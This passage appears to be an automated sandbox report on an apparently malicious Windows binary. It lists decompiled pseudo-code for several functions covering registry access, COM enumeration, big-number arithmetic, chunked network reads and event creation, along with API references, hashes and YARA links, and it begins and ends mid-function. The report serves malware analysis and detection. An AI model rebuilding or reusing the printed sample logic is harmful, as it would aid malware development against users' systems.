				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x11da38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E011D4AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E011D7702(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E011D50CA(_a8);
						goto L29;
					}
					_t64 =  *0x11da2cc; // 0x0
					_t65 = E011D4AA6(_t64,  *((intOrPtr*)(_t64 + 0xc)));
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d011d90
						if(E011D5F2A(_t97,  *_t33, _t91, _a8,  *0x11da384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x11da2d4; // 0x0
							if(_t98 == 0) {
								_t35 = _t68 + 0x11db9e0; // 0x702e7eb2
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x11db9db; // 0x45464f23
								_t69 = _t34;
							}
							if(E011D5927(_t69,  *0x11da384,  *0x11da388,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x11da2d4; // 0x0
									_t44 = _t71 + 0x11db86a; // 0xa453651
									_t73 = E011D4AA6(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d011d90
										E011D1F7A( *_t47, _t91, _a8,  *0x11da388, _a24);
										_t49 = _t101 + 0x10; // 0x3d011d90
										E011D1F7A( *_t49, _t91, _t99,  *0x11da380, _a16);
										E011D50CA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d011d90
									E011D1F7A( *_t40, _t91, _a8,  *0x11da388, _a24);
									_t43 = _t101 + 0x10; // 0x3d011d90
									E011D1F7A( *_t43, _t91, _a8,  *0x11da380, _a16);
								}
								if( *_t101 != 0) {
									E011D50CA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d011d90
					_t81 = E011D6A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d011d90
							E011D5F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E011D50CA(_t100);
						_t98 = _a16;
					}
					E011D50CA(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104) {
					goto L29;
				} else {
					_push(0x5f);
					_push(_a8);
					if( *0x11da110() != 0) {
						goto L29;
					} else {
						_t97 = _a8;
						E011D77A4(_t98, _a8,  &_v284);
						__imp__(_t102 + _t98 - 0x117,  *0x11da38c);
						 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
						_t91 = 0x80000003;
						goto L6;
					}
				}
			}

0x011d1d57
0x011d1d60
0x011d1d67
0x011d1d6c
0x011d1dd9
0x011d1ddf
0x011d1de4
0x011d1deb
0x011d1df2
0x011d1df5
0x011d1f60
0x011d1f67
0x011d1f67
0x011d1f6c
0x011d1f6e
0x011d1f6e
0x011d1f77
0x011d1f77
0x011d1dfb
0x011d1e07
0x011d1f56
0x011d1f59
0x00000000
0x011d1f59
0x011d1e0d
0x011d1e15
0x011d1e1c
0x011d1e1f
0x011d1e68
0x011d1e68
0x011d1e7b
0x011d1e85
0x011d1e8d
0x011d1e92
0x011d1e9c
0x011d1e9c
0x011d1e94
0x011d1e94
0x011d1e94
0x011d1e94
0x011d1ebe
0x011d1ec6
0x011d1ef4
0x011d1ef9
0x011d1f00
0x011d1f05
0x011d1f09
0x011d1f3b
0x011d1f0b
0x011d1f18
0x011d1f1b
0x011d1f2b
0x011d1f2e
0x011d1f34
0x011d1f34
0x011d1ec8
0x011d1ed5
0x011d1ed8
0x011d1eea
0x011d1eed
0x011d1eed
0x011d1f45
0x011d1f51
0x011d1f47
0x011d1f4a
0x011d1f4a
0x011d1f45
0x011d1ebe
0x00000000
0x011d1e85
0x011d1e2e
0x011d1e31
0x011d1e38
0x011d1e3e
0x011d1e41
0x011d1e43
0x011d1e4f
0x011d1e52
0x011d1e52
0x011d1e58
0x011d1e5d
0x011d1e5d
0x011d1e63
0x00000000
0x011d1e63
0x011d1d71
0x00000000
0x011d1d85
0x011d1d85
0x011d1d87
0x011d1d92
0x00000000
0x011d1d98
0x011d1d98
0x011d1da4
0x011d1db7
0x011d1dbd
0x011d1dc5
0x00000000
0x011d1dc5
0x011d1d92

APIs

lstrcpy.KERNEL32(?,?), ref: 011D1DB7

Part of subcall function 011D4AA6: lstrlen.KERNEL32(?,00000000,00000000,011D7909,011D13D0,?,011D55DE,011D55DE,?,011D55DE,?,00000000,E8FA7DD7,00000000), ref: 011D4AAD
Part of subcall function 011D4AA6: mbstowcs.NTDLL ref: 011D4AD6
Part of subcall function 011D4AA6: memset.NTDLL ref: 011D4AE8

Part of subcall function 011D1F7A: lstrlenW.KERNEL32(?,?,?,011D1F20,3D011D90,80000002,011D30C2,011D4106,0A453651,702E7EB2,011D4106,?,3D011D90,80000002,011D30C2,?), ref: 011D1F9F

Part of subcall function 011D50CA: HeapFree.KERNEL32(00000000,00000000,011D4239,00000000,00000001,?,00000000,?,?,?,011D6B8D,00000000,?,00000001), ref: 011D50D6

lstrcpy.KERNEL32(?,00000000), ref: 011D1DD9

Strings

\, xrefs: 011D1DBD
(, xrefs: 011D1E3A

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: fede39297b71601ddc1426739af444e6f2dd236521c09f0cb0bea572fe7bd11d
Instruction ID: 3f7f06a99ec389aefc58a89b5c5aaf16f75e77028100e750f46a3859b569c085
Opcode Fuzzy Hash: fede39297b71601ddc1426739af444e6f2dd236521c09f0cb0bea572fe7bd11d
Instruction Fuzzy Hash: 8B517D7210120ABFDF2A9FA4DC40EAA3BBAFF24314F004464FA6593060D735D959DB51

Uniqueness

Uniqueness Score: -1.00%

Function 011D161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 011D165B
SysFreeString.OLEAUT32(00000000), ref: 011D173E

Part of subcall function 011D6C6D: SysAllocString.OLEAUT32(011D92B0), ref: 011D6CBD

SafeArrayDestroy.OLEAUT32(?), ref: 011D1792
SysFreeString.OLEAUT32(?), ref: 011D17A0

Part of subcall function 011D1FC2: Sleep.KERNEL32(000001F4), ref: 011D200A

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 3a0562603c12ab5e6afd87e1472eb4511fc98e33cc3e6b32d40660bee0de9b22
Instruction ID: de2c238b94b1209e929f081d93dc8506c6e2690cae0e7da751908298f0ae9035
Opcode Fuzzy Hash: 3a0562603c12ab5e6afd87e1472eb4511fc98e33cc3e6b32d40660bee0de9b22
Instruction Fuzzy Hash: 43515276A0064AFFDB14DFE8C88489EB7B6FF88344B158869E615DB220D731AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 011D6C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E011D6C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x11da2d4; // 0x0
					_t5 = _t102 + 0x11db038; // 0xbc5b15aa
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x11d92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x11da2d4; // 0x0
												_t28 = _t108 + 0x11db0bc; // 0x766ff270
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x11da2d4; // 0x0
														_t33 = _t78 + 0x11db078; // 0xe2c46ab8
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x011d6c72
0x011d6c7b
0x011d6c7c
0x011d6c80
0x011d6c86
0x011d6c8c
0x011d6c95
0x011d6c9b
0x011d6ca5
0x011d6ca7
0x011d6cad
0x011d6cb2
0x011d6cbd
0x011d6cc5
0x011d6cc8
0x011d6deb
0x011d6cce
0x011d6cce
0x011d6cdb
0x011d6ce1
0x011d6ce7
0x011d6ceb
0x011d6cf1
0x011d6cfe
0x011d6d02
0x011d6d08
0x011d6d0b
0x011d6d11
0x011d6d17
0x011d6d1d
0x011d6d20
0x011d6d23
0x011d6d29
0x011d6d32
0x011d6d38
0x011d6d39
0x011d6d3c
0x011d6d3d
0x011d6d3e
0x011d6d46
0x011d6d47
0x011d6d48
0x011d6d4a
0x011d6d4e
0x011d6d52
0x00000000
0x00000000
0x011d6d58
0x011d6d61
0x011d6d67
0x011d6d71
0x011d6d75
0x011d6d77
0x011d6d84
0x011d6d88
0x011d6d90
0x011d6d95
0x011d6da7
0x011d6da9
0x011d6daf
0x011d6daf
0x011d6db8
0x011d6db8
0x011d6dba
0x011d6dc0
0x011d6dc0
0x011d6dc3
0x011d6dc9
0x011d6dcc
0x011d6dd5
0x00000000
0x00000000
0x00000000
0x011d6dd5
0x011d6d29
0x011d6d23
0x011d6d0b
0x011d6ddb
0x011d6ddb
0x011d6de1
0x011d6de1
0x011d6de7
0x011d6de7
0x011d6df0
0x011d6df6
0x011d6df6
0x011d6cb2
0x011d6dff

APIs

SysAllocString.OLEAUT32(011D92B0), ref: 011D6CBD
lstrcmpW.KERNEL32(00000000,E2C46AB8), ref: 011D6D9F
SysFreeString.OLEAUT32(00000000), ref: 011D6DB8
SysFreeString.OLEAUT32(?), ref: 011D6DE7

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 461ab35615759b524bbf2bcc9f8e0e5eb8cb327d5c29a61601c03d7507b52d7c
Instruction ID: 8c2e02622a1b575471090d5cd6872bb4a0aae33d5c03c1d20b0178bfc351655f
Opcode Fuzzy Hash: 461ab35615759b524bbf2bcc9f8e0e5eb8cb327d5c29a61601c03d7507b52d7c
Instruction Fuzzy Hash: 50514C75D0051AEFCF04DFA8D8888AEBBB9EF89704B144598E915EB215D731AD41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 011D5D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E011D5D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E011D28F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E011D1000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E011D3915(_t101,  &_v428, _a8, _t96 - _t81);
					E011D3915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E011D1000(_t101, 0x11da188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E011D1000(_a16, _a4);
						E011D3B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L011D7D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L011D7D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E011D679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E011D5AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E011D4A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x11da188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x011d5d96
0x011d5da2
0x011d5da8
0x011d5dad
0x011d5db1
0x011d5f23
0x011d5f27
0x011d5f27
0x011d5db7
0x011d5dbb
0x011d5dc1
0x011d5dc2
0x011d5dcd
0x011d5dd3
0x011d5dd8
0x011d5ddb
0x011d5df5
0x011d5e04
0x011d5e10
0x011d5e1a
0x011d5e1f
0x011d5e21
0x011d5e24
0x011d5edb
0x011d5ee1
0x011d5ef2
0x011d5f05
0x011d5f1b
0x00000000
0x011d5f20
0x011d5e2d
0x011d5e34
0x011d5e38
0x011d5e3e
0x011d5e40
0x011d5e42
0x011d5e44
0x011d5e46
0x011d5e50
0x011d5e55
0x011d5e57
0x011d5e59
0x011d5e5a
0x011d5e5b
0x011d5e5c
0x011d5e63
0x011d5e6a
0x011d5e6d
0x011d5e6d
0x011d5e3a
0x011d5e3a
0x011d5e3a
0x011d5e75
0x011d5e7d
0x011d5e89
0x011d5e8e
0x011d5e8e
0x011d5e93
0x00000000
0x00000000
0x011d5e95
0x011d5e98
0x011d5ea5
0x00000000
0x00000000
0x011d5ea7
0x011d5ea7
0x011d5eb4
0x011d5e8e
0x011d5e93
0x00000000
0x00000000
0x00000000
0x011d5e93
0x011d5ebe
0x011d5ec1
0x011d5ec4
0x011d5ecb
0x011d5ecb
0x011d5ed8
0x00000000
0x011d5ed8
0x011d5dc4
0x011d5dc8
0x011d5dc9
0x011d5dcb
0x00000000
0x00000000
0x00000000
0x011d5dcb
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 011D5E46
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 011D5E5C
memset.NTDLL ref: 011D5F05
memset.NTDLL ref: 011D5F1B

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 466a5481ecf524d3c42275e49022f898d3880b078b3fbf65934aa6c420f50165
Instruction ID: 7c873ff6c73ee364a02ba7a82592a9be7f092d3324ac9373808b995525517650
Opcode Fuzzy Hash: 466a5481ecf524d3c42275e49022f898d3880b078b3fbf65934aa6c420f50165
Instruction Fuzzy Hash: 7941C471A0022AAFDB18EF6CCC40BEE7775EF55354F008169F919A7180DB70AE44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 011D14A8, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E011D14A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x11da144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E011D6837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x11da2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E011D50CA(_v20);
											if(_v8 == 0) {
												_v8 = E011D37FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E011D25C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x011d14a9
0x011d14af
0x011d14ba
0x011d14ba
0x011d14bc
0x011d5aff
0x011d5b02
0x011d5b0b
0x011d5b0e
0x011d5b11
0x011d5b19
0x011d5c17
0x011d5c22
0x011d5c25
0x011d5c27
0x00000000
0x011d5c27
0x011d5b1f
0x011d5b22
0x011d5c2a
0x011d5c2a
0x011d5b28
0x011d5b2b
0x011d5b2c
0x011d5b2e
0x011d5b37
0x011d5c0e
0x011d5b3d
0x011d5b43
0x011d5b4a
0x011d5b4d
0x011d5bfc
0x011d5b53
0x00000000
0x011d5b53
0x011d5b53
0x011d5b53
0x011d5b53
0x011d5b58
0x011d5b5a
0x011d5b5a
0x011d5b67
0x011d5b6f
0x00000000
0x00000000
0x011d5b71
0x011d5b7e
0x011d5b84
0x011d5b84
0x011d5b87
0x00000000
0x00000000
0x011d5b89
0x011d5b94
0x011d5ba8
0x011d5bde
0x011d5baa
0x011d5baa
0x011d5bb1
0x011d5bb9
0x00000000
0x011d5bbb
0x011d5bbb
0x011d5bc6
0x011d5bc9
0x011d5bd0
0x00000000
0x011d5bd0
0x011d5bc9
0x011d5bb9
0x011d5be1
0x011d5be4
0x011d5bec
0x011d5bf7
0x011d5bf7
0x00000000
0x011d5bec
0x011d5b91
0x00000000
0x011d5bd3
0x011d5bd3
0x00000000
0x011d5bdc
0x011d5c03
0x011d5c03
0x011d5c09
0x011d5c09
0x011d5b37
0x011d5b22
0x011d5c34
0x011d14b1
0x011d14b1
0x011d14b8
0x011d14c3
0x00000000
0x00000000
0x00000000
0x011d14b8

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,011D7134,00000000,?), ref: 011D5B9B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,011D7134,00000000,?,?), ref: 011D5BBB

Part of subcall function 011D25C7: wcstombs.NTDLL ref: 011D2687

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 2af8ab9db837117820edce0e2fa44974b05f0bb26f0bc7e13bd6466b7295f86c
Instruction ID: ebc4c05e7d0dff86161438f2c30acdf8cfb710f8008bff886447ca721beaf48e
Opcode Fuzzy Hash: 2af8ab9db837117820edce0e2fa44974b05f0bb26f0bc7e13bd6466b7295f86c
Instruction Fuzzy Hash: 234160B1901219EFDF68DFA8D9849AEBBBAFF04344F104579E512E3140E7309A80DF51

Uniqueness

Uniqueness Score: -1.00%

Function 01117630, Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

std::_String_base::_Xlen.LIBCPMTD ref: 01117643

Part of subcall function 01118620: std::bad_exception::bad_exception.LIBCMTD ref: 01118660
Part of subcall function 01118620: __CxxThrowException@8.LIBCMTD ref: 0111866E

std::_String_base::_Xlen.LIBCPMTD ref: 0111766A
std::_String_base::_Xlen.LIBCPMTD ref: 01117681
_memcpy_s.LIBCMTD ref: 011176FA

Memory Dump Source

Source File: 00000000.00000002.479054596.00000000010EE000.00000020.00020000.sdmp, Offset: 010EE000, based on PE: false

Similarity

API ID: String_base::_Xlenstd::_$Exception@8Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 649725542-0
Opcode ID: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction ID: e043a57a255a30e628c1d0b58d2eba0171afbcc154e2e640c19853c86374f2af
Opcode Fuzzy Hash: da8699e3ad0ce92a7cba2f435691a1b9777dfed02a1e85352a95ff36596fc585
Instruction Fuzzy Hash: 5831C1323007028BD328DE5DD88096BF7E5DBA1265F144D3EE592877A6E771E884C791

Uniqueness

Uniqueness Score: -1.00%

Function 011D5C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 011D5C8C
SysAllocString.OLEAUT32(011D1E05), ref: 011D5CCF
SysFreeString.OLEAUT32(00000000), ref: 011D5CE3
SysFreeString.OLEAUT32(00000000), ref: 011D5CF1

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 386320c4e9f2279a1a956eebb0dc678da8c9826da087b08e9de3c7bded1d9276
Instruction ID: d8d9f705cf8d46dbe177af370dfd242184abc04421c3b10287fc4ad2b96937f1
Opcode Fuzzy Hash: 386320c4e9f2279a1a956eebb0dc678da8c9826da087b08e9de3c7bded1d9276
Instruction Fuzzy Hash: CF313E7290110AEFCB19DF9CD4C48AE7BB9FF48344B21852EF90A97250D7359685CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 011D73C3, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E011D73C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x11da2c8; // 0x0
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x11da2d4; // 0x0
				_t3 = _t8 + 0x11db8a2; // 0x2b8b8603
				_t25 = 0;
				_t30 = E011D2DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x11da2f8, 1, 0, _t30);
					E011D50CA(_t30);
				}
				_t12 =  *0x11da2b4; // 0x23f00206
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E011D513E() == 0) {
